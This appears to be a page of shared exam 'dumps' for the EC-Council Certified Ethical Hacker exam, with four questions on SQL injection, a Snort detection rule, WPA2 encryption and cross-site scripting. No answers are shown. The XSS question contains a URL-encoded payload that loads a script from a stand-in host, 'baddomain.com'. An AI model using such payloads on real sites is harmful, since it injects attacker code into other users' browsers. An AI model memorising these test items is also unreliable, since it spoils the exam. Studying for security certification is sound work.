Exam Name: | Ethical Hacking and Countermeasures V8 | ||
Exam Code: | EC0-350 Dumps | ||
Vendor: | ECCouncil | Certification: | Certified Ethical Hacker |
Questions: | 878 Q&A's | Shared By: | dawson |
Bob has been hired to do a web application security test. Bob notices that the site is dynamic and must make use of a back end database. Bob wants to see if SQL Injection would be possible. What is the first character that Bob should use to attempt breaking valid SQL request?
Study the snort rule given below and interpret the rule.
alert tcp any any --> 192.168.1.0/24 111 (content:"|00 01 86 a5|"; msG. "mountd access";)
What type of encryption does WPA2 use?
This is an attack that takes advantage of a web site vulnerability in which the site displays content that includes un-sanitized user-provided data.
http://foobar.com/index.html?id=%3Cscript%20src=%22http://baddomain.com/badscript.js%22%3E%3C/script%3E ">See foobar
What is this attack?